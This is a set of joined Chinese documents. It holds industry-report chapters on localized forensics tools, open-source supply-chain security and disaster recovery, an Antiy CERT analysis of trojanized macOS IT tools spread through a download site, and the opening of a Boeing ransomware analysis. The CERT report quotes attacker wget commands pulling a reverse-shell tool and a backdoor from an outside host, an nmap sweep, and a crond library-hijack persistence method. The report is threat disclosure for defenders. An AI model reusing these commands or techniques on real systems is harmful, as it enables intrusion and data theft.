内来看,无论是科学研究项目的投入还是产业投资,在电子数据取证领域都 严重不足,从而导致人才流失、技术能力低下, 一直处于低水平徘徊的状态。 在市场需求方面,目前国产化电子数据取证产品的市场需求仍然有待进 一步挖掘,电子数据取证产品的主要用户是公安等执法部门,而执法人员在 使用电子数据取证设备时,除了使用厂家的电子数据取证产品之外,还会在 设备中自行安装各类工具软件与取证产品配合使用,以适应电子数据取证多 种多样的场景。执法人员在工作中更习惯于使用Wintel 平台,对于国产化取 证产品接受度仍然不够,对于终端类产品难以适应和接受国产化平台下的操 作习惯以及相关的兼容性问题。很多执法部门还没有认识到违法犯罪的主战 场早已经转移到了网络和虚拟空间。 在成本方面,电子数据取证产品所需的硬件设备与普通家用整机存在差 别,需要集成各类介质接口,并且对接口数量和读写控制有一定要求,因而 国产化取证硬件设备不仅需要专门定制,还将提高取证厂商的产品成本,同 时国产化取证设备在性能上相比非国产化设备也不占据优势。 在人才培养方面,目前国内对于电子数据取证人才的培养体系仍不健全, 高校一般不为电子取证开设单独的专业,仅将电子取证的相关课程加入网络 空间安全或计算机相关专业,使得电子取证在人才培养方面存在课程体系不 健全、校企合作程度不深、师资力量缺乏等问题。电子取证新生人才缺乏, 许多计算机相关专业人才甚至从未听说过电子取证这一领域,导致电子取证 厂商在培养人才队伍时遇到困难。 23.3 推广国产化电子数据取证产品 23.3.1 开放合作,赶超国外先进技术 在电子取证领域, 一些电子取证的解决方案是由国外的技术团队提出, 如 uncOver 、Checkraln 等,部分厂商的取证产品中也对这类解决方案进行了 整理和集成。在对电子取证产品国产化进行规划时,厂家应当认识到国外解 决方案的先进性,借鉴国外解决方案的成功经验,充分利用已有的成熟技术 成果,实现电子取证产品功能的国产化替代。 同时,电子取证厂商应加强国际技术沟通与合作,通过网络社区、学 术会议等途径,在手机解锁、密码分析、隐写识别技术等方面,与国际电子 取证技术团队开展技术交流,学习国外优秀解决方案的关键技术,尤其是细 节内容及难点,从工作原理、系统流程、架构组成等方面进行系统性梳理, 在消化吸收的基础上对其进行国产化改造,并进行模拟和验证,向国际先进 水平不断靠拢。通过服务的形式将应用程序的功能单元连接起来,采用中立 的方式定义接口,使其独立于实现服务的硬件平台、操作系统和编程语言, 并具有跨平台运行的能力,产品采用的数据库、中间件也各不相同,需要开 展有针对性的详细设计,采用逐步替代的方式实现国产化替代工程的有序开 展、稳步推进、平稳过渡,最终使用国产化电子取证解决方案替代境外技术 组件。 23.3.2研究国情,开发适用的产品 电子取证的自主创新需要符合中国国情。各个国家之间的法律制度存在 差别,电子取证作为法律和技术的交叉学科,相比其他技术领域与法律法规 具有更强的关联性。国外的电子取证产品更加适合外国执法人员的调查取证 流程和使用习惯,国内厂商在借鉴国外电子取证产品的功能和流程时不能照 搬照抄,需要根据我国电子取证的相关法律和标准规范开发适用的产品。同 时,国内用户在使用手机、电脑设备时常用的品牌型号、应用软件、使用习 惯等也与国外用户存在很大差异,电子取证产品的自主创新需要结合国内用 户的使用场景,响应一线执法部门的办案需求,才能研发出有中国特色的电 子取证自主创新产品,走出中国特色的自主创新道路。 23.3.3 培养人才,实现可持续发展 电子取证行业需要从学历教育、在职培训、认证培训等方面多措并举, 特别是作为一个与公共安全紧密关联的行业,在人才培养的过程中更加需要 强调国产自主可控的重要性。 国内高校可以更多地开设相关专业和课程,与电子取证厂商和其他厂商以 课题申报、联合实验室、实训基地等形式开展课程设计和学生培训,在课程中 融入生态场景,进一步提升电子取证自主创新的学历教育人才培养策略。 对于在职培训而言,在企业内部可由了解产品研发的老员工对新员工进 行“传帮带”,或聘请外部顾问专家开展培训活动,逐渐形成自主创新人才 梯队;在企业外部可开展面向友商和用户的电子取证国产化相关技术和产品 的培训讲座或系列课程,提升整个电子取证行业的自主创新水平。 电子取证厂商可以与其他厂商、相关主管单位共同推出电子取证领域的 认证培训,颁发如电子取证技术工程师、电子取证项目管理师的认证证书, 从而为电子取证行业培养更多人才,为企业用人提供专业技术的权威参考。 23.3.4 拓展市场,形成良性循环 国产化电子数据取证产品的推广需要与网信自主创新推进的趋势紧密结 合。目前国产软硬件、数据库、中间件、操作系统等都已实现了快速的发展, 面向办公的生态环境已基本形成,在这样的大背景下,各地执法部门也逐渐 开始进行信息科技方面的国产化改造,为国产化电子数据取证产品的推广提 供了良好的土壤。因此,各电子数据取证厂商在下一阶段应当解决从无到有 的问题,逐步填补国产化电子数据取证产品的空白,结合各厂家的特色推出 自己的国产化电子数据取证产品,构建起国产化电子数据取证生态体系。除 了执法部门之外,在国产化进度较快的金融、电力等行业,也可以进行产品 的市场拓展,使国产化电子数据取证产品在行业的广度和深度都能够得到提 升。 23.3.5产学研结合,开展技术攻关 电子数据取证厂家应结合行业特点,与高等院校、 一线执法单位以及其 他上下游国产化厂商开展产学研合作,对当前国产化电子数据取证技术中的 短板开展联合技术攻关。如国产化环境下的手机取证产品的研发,就需要电子 数据取证厂商与国产操作系统厂商在数据备份、数据提取等技术方向上共同努 力,解决各品牌型号的手机在国产化环境下的取证难题。通过联合技术攻关和 适配,不断增加国产化电子数据取证产品覆盖的种类,使国产化电子数据取证 产品能够适配更多的国产化操作系统、整机等,并在各种日常应用场景下开展 技术验证。同时,在网信国产化已成为大势所趋的情况下,需要对国产化环境 开展取证的场景也必将增加,因此还需要针对国产化软硬件的电子数据取证 流程和方法开展研究,使其成为传统电子数据取证技术的重要补充。 23.3.6 制订标准,指引行业前进 标准是网信产业发展的重要技术基础,是行业在发展过程中积累起来的 经验和知识的体现,也是行业发展水平的起点。目前,电子取证行业中已有 的标准规范更多的是针对电子数据取证和检验鉴定中的技术问题制定的,对 于电子取证产品本身的要求并未做过多规定。在电子取证自主创新方兴未艾 的当下,各厂商均在“摸着石头过河”,需要国家、主管单位、领头企业等 各方力量共同协作,组织电子取证业内各方共同设立电子取证自主创新建设 的标准,立足我国实际情况和已有标准规范,使建立的标准清晰可靠、可操 作性强,做到标准与产业协调发展、新建规范与已有规范协调统一。标准的 制订将使企业有据可依,无论是对于自主创新进程的推进还是对产业长期发 展而言都至关重要,有助于塑造市场规范和有序化生态氛围。 本章主笔人员: 广东中科实数科技有限公司丁丽萍、刘栋 24.软件供应链安全 现代软件开发中,开源代码的使用已经越来越广泛。这当中,开源软件 自身的漏洞不可避免地会直接影响到所开发应用软件的安全。随着开源软件 的发展规模越来越大、影响范围越来越广,其依靠源代码公开、方便获取等 优点越来越为业界所喜爱和关注。特别是国家着力解决“卡脖子”问题以来, 开源软件又被赋予了更多的期望。目前,开源已经成为支撑和促进网信产业 自主创新的重要因素。 24.1 软件的供应链风险需要得到重视 24.1.1 针对开源软件的攻击越来越多 开源软件的核心价值之一是开放复用,在降低开发成本的同时使得开 发交付更高效敏捷。开源软件复杂的依赖关系将导致巨大的软件供应链安 全风险。有关数据 l² 显示,在17个行业约1700个应用软件代码中,96% 的软件代码包含开源代码,其中84%的软件代码中至少存在1个开源代码 的漏洞。 针对上游开源依赖项进行攻击具有一个显著的特点,那就是攻击隐密 性强且攻击效果能呈指数级放大。因此,开源软件吸引了大量攻击行为。据 Sonatype 最新发布的《软件供应链现状报告》I³中显示,在过去三年中,针 对上游开源代码存储库的攻击数量增加了742%。在开源存储库中共发现近 95000个恶意软件包,而在2022年新增了近55000个恶意软件包,开源软件 供应链攻击整体呈现出爆发式增长态势。 l2 https://www.synopsys.com/software-integrity/resources/analyst-reports/ open-source-security-risk-analysis.html l3 https://ww.sonatype.com/resources/2023-software-supply-chain-report 24.1.2开源软件面临的技术风险 开源软件供应链可以分为开发、交付、使用三个环节,每个环节存在各 自安全风险。开发阶段,攻击者可能通过污染开发工具来控制上游软件供应 链;交付阶段,攻击者可能利用捆绑、下载劫持等方法实施攻击;使用阶段, 攻击者可能通过在更新升级或打补丁过程中植入恶意代码控制用户系统。 针对上游开源组件或开源代码的攻击是目前最主要的软件供应链攻击方 式,攻击手段主要包括:恶意代码注入、依赖项混淆、误植域名( Typosquatting)、 品牌劫持(Brandjacking) 和抗议软件(Protestware)等。开源软件供应链攻击 的显著特点是攻击手段隐秘性强,且具有不可预见性的特点。恶意代码注入 攻击,是一种利用流行组件作为恶意代码载体的攻击类型,攻击者首先会攻 击开发者系统或代码库,获取对库源代码的访问权限,然后利用开发者的权 限向代码库提交恶意代码,用户基于对开发者及其对项目的历史信任基础, 并不会对新版组件安全性产生怀疑。抗议软件(protestware)是另外一种攻击 形式的恶意代码注入攻击,与恶意代码注入不同的是,攻击者是开源项目开 发者本人。 24.1.3 开源软件的知识产权风险 开源软件在分发时一般会声明其使用的开源许可证。由于开源软件的许 可协议条款由开源软件作者自定义,这导致许可证内容也非常自由并且种类 也极其多样,容易出现知识产权风险。据不完全统计,目前有超过2000种 不同版本的开源许可证,即便是获得OSI 认证的许可证也多达96种。另外, 开源许可证对分发限制、使用、专利、商标、版本等内容都作出了要求,如 未能履行开源许可的义务,可能会造成侵权进而导致索赔、诉讼、专用代码 被开源、软件被迫下架或停用、商誉受损等风险。 另外,在复杂的国际形势下,全球主流开源组织、社区、开源代码托管 平台都由欧美国家的相关组织所控制,开源软件还面临比较严峻的断供风险。 例如,2022年4月俄罗斯开发者遭到GitHub 封号,禁止访问、并删除托管 代码等“断供”行为。 24.2 开源软件供应链风险源自三个主要因素 24.2.1 缺少对开源软件的安全管理 软件开发人员在开发过程中引入开源软件或开源代码时往往只关注其在 功能、性能、可用性、兼容性、可扩展性,缺少对开源软件自身安全漏洞、 开源软件许可、可持续供应等方面的评估。在使用过程中往往忽视对已使用 的开源代码建立台账、对开源软件安全风险进行持续跟踪等问题,最终导致 使用开源软件的安全风险增大。 24.2.2 缺少开源软件供应链安全情报库 目前普遍使用的漏洞库(如: NVD、CNVD、CNNVD 等)都缺少对开 源软件的全版本(所在历史及最新版本)信息库、依赖关系信息库、开源许 可证信息库等关键要素的支持。另外,传统漏洞库也不会收录开源软件的篡 改、污染、劫持、断供等威胁情报信息。由于缺少有效的开源软件供应链安 全情报库的支持,采用人工检索开源软件安全威胁的方式,导致开源软件安 全管理效率低、效果差等问题。 24.2.3 开源软件受到属地出口管制 开源生态基础设施的主要核心由开源组织(如基金会)、开源代码托管 平台、开源制品分发平台(如中央仓库)等组成。这些组织者均会受到属地 出口管制政策的约束。以汇聚了全球最多开发者同时也是规模最大的代码托 管平台 GitHub 、全球规模最大的容器托管平台 Docker Hub 、国际最为著名 的开源基金会 Apache 软件基金会为例,他们均受美国《出口管理条例》的 约束。 24.3 防范开源软件供应链安全风险 24.3.1 建立开源软件安全治理体系 企事业单位应建设开源软件安全治理体系。安全治理体系除了组织、流 程和安全审查机制之外,还应覆盖软件的全生命周期:在软件项目设计阶段, 应提前对需要使用的开源软件进行评估与选型,评估要点除了可用性(功能、 性能、可靠性、兼容性等)外,还应重点评估开源软件的安全性和断供风险; 在软件开发阶段,引入开源软件时应利用源代码分析工具对开源组件进行安 全扫描,避免引入已知高危漏洞;在软件上线发布验收阶段,应再次对项目 进行回归检查;在软件运营阶段,应持续做好开源软件安全风险监测工作, 发现威胁并及时处置。 24.3.2 建设开源软件供应链安全情报库 开源软件供应链安全情报库是开源软件供应链安全的数据底座。开源软 件信息是风险分析和安全治理的基础,因此实现开源软件安全治理首先要掌 握开源软件的基础信息,包含组件信息、漏洞信息、开源许可、供应商信息等。 建立一个数据全面、具备参考性的开源软件知识库,不断搜集获取开源软件 最新情报,是支撑软件供应链安全治理的根本,能有效支撑开源软件供应链 风险持续监测,提升安全应急响应速度,提高开源软件安全治理的效能。 24.3.3 发展国内开源生态 面对开源软件供应链“卡脖子”风险,应基于积极影响、深度储备、提 前防范的发展思路,主动积极地融入全球开源生态,提升国内开源组织在全 球开源生态中的话语权。同时应大力支持高校、企事业单位深度参与编程语 言、操作系统、云计算、AI、 大数据、数据库、中间件、应用服务器等关键 开源项目,储备开源技术生态人才。另外,在开源基础设施建设方面,应加 强代码托管平台、中央仓库等基础设施与国外数据的镜像同步。 本章主笔人员: 杭州孝道科技有限公司徐锋、朱雅汶、陈小赛 安全篇-灾备 25. 灾 备 灾备是一个系统工程,需要一系列产品有机组合才能完成业务系统的灾 备目标。灾备产品从技术细分主要有数据传输与加密、数据复制、归档、快照、 灾备的负载分流、灾备运维监控与管理、灾备切换流程管理等。 25.1 国产灾备产品在技术和应用上仍有短板 近年来,以云计算、大数据、移动互联网、物联网等为代表的新一代信 息技术,带来新的架构模式和技术体系,应用系统的架构已逐步演进到虚拟 化、云化以及云原生部署,灾备技术的热点也由原来的存储阵列同步、传统 数据库同步等转移到云环境下的虚拟机同步、分布式存储同步、分布式数据 库同步、双活多活管理等领域。 得益于开源创新体系以及国内市场环境,国产灾备产品在细分技术领域 上形成了局部的突破,随着信息系统关键基础核心产品国产化率的提升,生 产环境的信息化平台建设逐步转向国产化。市场占有率也在不断的提升,并 在个别灾备建设场景中占有一定优势,但仍存在以下问题: (1)关键核心技术存在短板,尤其是基于主机、数据库、存储阵列传 统系统架构下的数据同步复制,灾备的产品及技术依赖于国外产品本身提供 的基础功能,存在“卡脖子”现象,各项关键指标和性能尚须提升; (2)由于历史原因,高端灾备市场信息系统以传统架构为主,相应的 备份归档、数据同步、负载分流、数据去重等产品仍以国外产品为主,国产 灾备产品各种关键技术还需要突破与大量的实际案例验证; (3)国产灾备产品因发展时间较短,往往局限于产品自身,未能充分 考虑灾备的整体业务需求,尚缺乏较完备的灾备功能、调用接口与持续服务 的支持。 25.2 国内灾备产业发展面临三方面的问题 一方面,受制于传统架构主机、数据库、存储阵列等相关核心组件的技 术壁垒,国产灾备产品很难在短时间内实现技术上的超越。国产产品需要凭 借对客户需求的理解与国外产品竞争。 另一方面,高端灾备市场对业务中断风险的容忍度较低,对数据恢复的 完整性、可靠性以及恢复速度要求严格。在这些领域,灾备系统的建设较早, 这就意味着用户对国外灾备产品有较强的依赖性。如果对生产环境架构进行 改造,必然会导致信息化投入的增加。另外,新架构对运营团队也提出新的 要求,由于担心新产品的稳定性和健壮性对灾备管理及业务的运营产生影响, 因而导致国产化产品的应用推广面临阻力。 第三,国内对于灾备业务的理解还不到位。灾备需要从网络、应用、数 据库、存储等各个专业角度进行联动和协同,同时灾备需要切换验证与演练。 为了提高灾备切换效率,需要灾备产品提供相应的自动化处理接口与功能,而国 产厂商对这些问题的关注度还不足,相关产品和其服务还需要拓展和延申。 25.3 灾备产业发展需要从三个方面着手 25.3.1灾备产业依赖于基础软硬件产业 国产灾备产业的发展依赖于国产基础软硬件核心技术和关键产品的发 展。需要加强产业基础研究,从底层突破国外技术壁垒,增强国产灾备产品 在传统灾备领域的竞争力。同时,要重视开源创新体系的建设,进一步提升 与加快国产灾备产品在新技术架构下创新发展的质量与速度,实现“升级换 代”过程中的“弯道超车”。 25.3.2灾备厂商需要增强服务意识和运营能力 数字化和智能化升级后运营对信息系统的依赖逐步加深,国家对灾备建 安全篇-灾备 设重视程度不断提高。行业对灾备建设监管检查的逐步年度化、现场化和场 景化,灾备能力已经成为重点行业、重点单位的核心竞争力之一。灾备厂商 需要加强对灾备服务的理解,提升服务能力,利用成熟的技术和科学的方法帮 助用户实现灾备的建设目标,努力提升灾备建设的投资回报。同时要注意到灾 备环境所面对的是动态变化的生产系统,加强自动化管理水平、提升运维人员 的能力,对产品在整个灾备切换过程中的性能、功能有清晰的定位,提供完善 的自动化能力与管理接口,帮助用户实现“随时能切,随时能用”的目标。 25.3.3 灾备厂商需要关注灾备的全生命周期 厂商要充分认识到灾备建设不是单纯的产品交付,而是一个长期持续性 的项目,要全面思考灾备体系建设中各个环节的技术问题,从规划设计、建 设实施和安全运维管理等全生命期各阶段提供灾难恢复服务。 应关注的几个关键节点包括: 一是要评估业务中断影响的各个维度,梳 理业务的恢复要求与恢复优先级,理清业务与信息系统的依赖关系,实现分 层分级,制定合理的灾难恢复和服务保障目标,明确最小资源需求清单,制 定合理的恢复策略。二是要通过平台协同明确各层级岗位职责与权限,形成 多部门专业协同,提高灾备切换效率,降低失误率,减少灾备切换时间,降 低风险。三是要形成预案体系,包括应急预案体系和灾难恢复预案体系。四 是通过对灾害场景的验证与演练,验证灾难备份中心的实际切换与真实生产 任务的接管能力。五是加强灾备系统的自动化能力。六是建立知识智能沉淀 机制,实现历史经验智能沉淀到知识库中,在处理相似问题时提供参考。
standards
“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析 1.概述 近期,安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡,进行横向渗透的攻击活动。 此下载站目前可下载数十个破解软件,其中五款运维工具包含恶意文件,这五款运维工具集中在服务运维工具分类中,安天CERT判断该事件针对的目标为国内IT运维人员。当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站,如果下载执行了含有恶意文件的运维工具,那么恶意文件会连接攻击者服务器下载并执行远控木马,攻击者可通过此远控木马窃取主机中的数据和文件,确定受害者及所在单位的信息,为后续横向渗透做准备。 安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段:攻击者使用远程控制的方式窃取了受害者macOS操作系统主机中的文件;下载并使用fscan、nmap等工具对受害者的内网进行扫描,以获取内网更多服务器和主机的信息;利用口令破解、漏洞利用等渗透手段尝试获取更多服务器和主机的系统权限,横向渗透成功后在服务器上部署并运行hellobot后门。在此次行动中,虽然攻击者的横向渗透水平相对较弱,但是依然成功获取了服务器的系统权限。入侵成功后可能导致数据被窃、信息泄露、被长期监视等安全风险。 安天CERT的分析人员在搜索站搜索“Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查。 该黑产团伙采用供应链投毒、伪造官方软件网站、以及利用破解软件等多种方式传播恶意程序,主要攻击目标是IT运维人员,攻击范围涵盖了Windows、Linux以及macOS等操作系统。此外,该团伙使用经过精心构造的域名,并对下载的载荷文件进行混淆处理,以规避安全产品的检测,因此安天CERT用“暗蚊”组织命名该团伙。 在即将发布该报告时,安天CERT关联到了近期深信服披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》[1],发现此次事件攻击活动中攻击者可能与友商披露的攻击者为同一批团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。 2.详细情况 2.1 监测情况 安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件,连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。 SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件: 从该下载站的下载数量来看,含有恶意文件的五款运维工具下载总量已超3万次。安天CERT评估此次攻击活动影响范围较大,且大部分威胁情报平台尚未标记相关的恶意IoC情报,故披露此次攻击活动。建议在该下载站下载过这类运维工具的用户进行自查,详细自查方法请参考本报告第六小节。 被植入恶意文件的运维工具相关信息: 文件名:SecureCRT.dmg MD5:94E0EE6189DF1DAD0EFB01374D67815C 被植入恶意文件名:libpng.dylib 下载量:6094 文件名:ultraedit.dmg MD5:3FF4C5A86CE6A35B6D9A49478BD1058D 被植入恶意文件名:libConfigurer64.dylib 下载量:6716 文件名:Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg MD5:81F75533298736A23597A34B505209B5 被植入恶意文件名:libpng.dylib 下载量:1507 文件名:FinalShell_MacYY.dmg MD5:808B17A47A91421F50AF04A865DE26C7 被植入恶意文件名:libpng.dylib 下载量:824 文件名:navicat161_premium_cs.dmg MD5:B74301CB51FB165F1ED8F2676A39FBBF 被植入恶意文件名:libpng.dylib 下载量:16188 当运维人员寻找macOS平台下免费的运维工具时被引流到该下载站,并从中下载执行含有恶意文件的运维工具。恶意文件会连接C2下载远控执行。攻击者在构造恶意域名时,针对不同运维工具采用不同域名且字符串与对应的运维工具文件名相关,从而增加通信隐蔽性。 文件名:SecureCRT.dmg 恶意域名:download.securecrt.vip 文件名:ultraedit.dmg 恶意域名:download.ultraedit.info 文件名:Microsoft-Remote-Desktop-Beta-10.8.0(2029)_MacYY.dmg 恶意域名:download. rdesktophub.com 文件名:FinalShell_MacYY.dmg 恶意域名:download.finallshell.cc 文件名:navicat161_premium_cs.dmg 恶意域名:download.Macnavicat.com 2.2 攻击活动的时间线 攻击者从2023年3月份便着手开始策划此次攻击活动,其最早开始于3月20日注册了其所使用部分的C2域名,在3月至7月期间攻击者陆续注册了此次攻击活动中所涉及的10个C2域名,并在期间攻击者将使用的部分载荷上传至VT测试其免杀效果。最后攻击者在9月19日和20日将被植入恶意文件的五款运维工具上传至该下载站。 3.攻击流程 被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马,该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。 3.1 初始访问攻击 由于攻击者在这五款运维工具中所采用的攻击方式一样,初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后,软件加载被植入的恶意文件libpng.dylib,连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马,该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力;libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器,该加载器会将自身添加至开机启动项中,以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到,故无法分析其最终落地载荷。 3.2 内网横向移动流程 安天CERT以攻击者发起的一起实际行动为案例,揭示攻击者横向渗透的手段: 步骤1:远控下载反向Shell工具 在受害者macOS操作系统主机中成功植入Khepri远控木马后,攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马,该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下: wget http://159.75.xxx.xxx:443/mac2 步骤2:文件窃取和分析 攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析,为进一步的横向移动做准备。 步骤3:内网网络扫描 攻击者下载了fscan、nmap等扫描工具,并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外,攻击者还利用fscan扫描工具对内网进行了扫描,以获取内网更多服务器和主机的信息,包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示: nmap -Pn -p22 -oG - 172.xx.xx.xxx/24 步骤4:使用多种渗透手段: 攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下: ssh xxxxx@172.xx.xx.xxx 步骤5:部署后门进行持久化 攻击者会访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门,该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件命令如下所示: wget http://159.75.xxx.xxx:8088/centos7 尽管在此次行动中,攻击者的横向移动整体水平相对较弱,然而并不能忽略其所带来的危害。即使攻击者横向移动能力有限,但仍能通过成功植入恶意软件、利用漏洞和暴力破解等手段,对受害者的系统和数据造成严重的损害。这种攻击形式可能导致敏感信息泄露、系统崩溃、服务中断以及进一步的攻击扩散,对受害者的隐私和安全构成潜在风险。因此,需认真对待这些攻击,并采取适当的安全措施来保护系统和数据免受威胁。 4.关联分析 经关联分析发现,“暗蚊”黑产团伙可能与近期友商披露的报告《【高级持续威胁(APT)】谁是“amdc6766”:一年四起供应链投毒事件的幕后黑手》中的攻击者为同一团伙。本次事件中用于传播的工具都是IT运维人员日常使用频次较高的软件工具,两起事件针对的目标重合;在诱饵工具名称和域名的伪装方面思路相似;载荷使用了相同的域名。 1. 本次事件针对IT运维人员,且工具名称和使用的域名相似 攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat,都是IT运维人员日常使用频次较高的软件工具,且都被归于该网站的“服务器运维”类别中,表明攻击者有针对性地对IT运维人员进行攻击。 此外,攻击者在本次攻击活动中用于托管恶意载荷的域名,形式上也与攻击者在此前攻击活动中使用的相似。 2. 使用crond服务持久化和后门动态链接库手法与友商披露类似 本次攻击活动中攻击者在内网Linux机器上访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。 3. 最终载荷使用的恶意域名amdc6766.net相同 在本次攻击活动中,攻击者在内网Linux机器上使用的最终载荷为hellobot后门,其外联域名为Microsoft.amdc6766.net,与友商分析报告中披露的恶意域名相同。 5.样本详细分析 5.1 破解版SecureCRT软件分析 由于攻击者在这五款运维工具中所采用的攻击方式一样,样本详细分析以破解版的SecureCRT软件分析为例。 注:可在计算机病毒分类命名百科全书Virusview.net,搜索“DarkMozzie”查看更多该病毒家族相关信息。 SecureCRT是VanDyke Software公司开发的一个商业SSH、Telnet客户端和虚拟终端软件。本次攻击活动破解版SecureCRT软件相较于官网提供的SecureCRT,在Frameworks文件夹中多出一个名为“libpng.dylib”的动态库文件。 破解版SecureCRT的主Mach-O文件运行时会对该动态库文件libpng.dylib进行加载。 5.1.1 libpng.dylib文件分析 libpng.dylib从硬编码的URL处获取下一阶段载荷文件,解码后保存至指定的路径中执行。 6.安全建议 针对以“暗蚊”为代表的黑产团伙,以IT运营者使用远程访问、编辑器、数据库管理等免费或破解版运维工具作为突破口投放攻击载荷,通过网内横向移动,进一步收集信息并维持持久化,最终窃取主机中的数据和文件的攻击模式,安天CERT建议: 6.1 开展针对性自查 1、对于使用苹果操作系统的IT运营者 (1)确认是否曾在MACYY或其它网站中下载以下运维工具并核对破解软件的MD5:远程访问(SecureCRT、FinalShell 、Microsoft Remote Desktop)、编辑器(UltraEdit)、数据库管理(Navicat Premium); (2)检查/tmp/目录中是否存在.test、.fseventsds文件,/Users/Shared/目录中是否存在.fseventsd文件,并检查.fseventsd文件是否被设置为开机启动项。 2、对于使用Linux操作系统的IT运营者 (1)检查/usr/sbin/cron(或crond)文件近期是否被改动; (2)检查/usr/sbin/cron(或crond)文件所依赖的动态链接库中是否存在libdb.so.2文件; (3)检查libdb.so.2文件是否存在问题:检查MD5是否为F23ED5D991CF0C8AA8378774E8FA93FE,或者检查libdb.so.2文件的改动时间是否与/usr/sbin/cron(或crond)文件的改动时间相近。 6.2 增强正版软件使用意识 建议IT运营者(尤其是使用苹果操作系统的IT运营者)从官方地址下载常用运维工具,以破解为代表的免费下载站极大可能存在供应链污染,尤其不要相信“苹果操作系统上不会存在病毒”的伪科普。更重要的是,由于IT运营者在使用苹果设备时极大可能不会经常关机,以致“暗蚊”黑产团伙通过远控并持续窃密留下了可乘之机。 6.3 加强主机侧安全防护 建议IT运营者部署企业级终端防御系统,加强针对“暗蚊”黑产团伙在内网横向移动环节的防护,可以从端点暴破、横向移动、新增文件、修改配置等多个环节进行全链路的检测,根据不同的攻击阶段对其行为进行溯源分析,第一时间感知威胁,并进行清除,深度还原攻击路径,为固证取证提供有力的支持。 6.4 提升网络威胁监测与响应 建议IT运营者部署网络威胁检测与响应系统(NTA或NDR)可以结合“暗蚊”相关信标进行告警。
standards
波音遭遇勒索攻击事件分析复盘——定向勒索的威胁趋势分析与防御思考 时间 : 2023年12月30日 来源: 安天CERT 1.概述 2016年前后,勒索攻击的主流威胁形态已经从勒索团伙传播扩散或广泛投放勒索软件收取赎金,逐渐转化为RaaS+定向攻击收取高额赎金的运行模式。RaaS为Ransomware as a Service(勒索即服务)的缩写,是勒索团伙研发运营的勒索攻击基础设施,包括可定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击团伙和个人租用RaaS攻击基础设施,在获得赎金后,与RaaS攻击组织分账结算。在众多勒索攻击组织中,LockBit组织最为活跃,从其公布的数据显示,LockBit的RaaS支撑了上千起的攻击活动,并因一例涉及中资企业海外机构案例被国内外广泛关注。 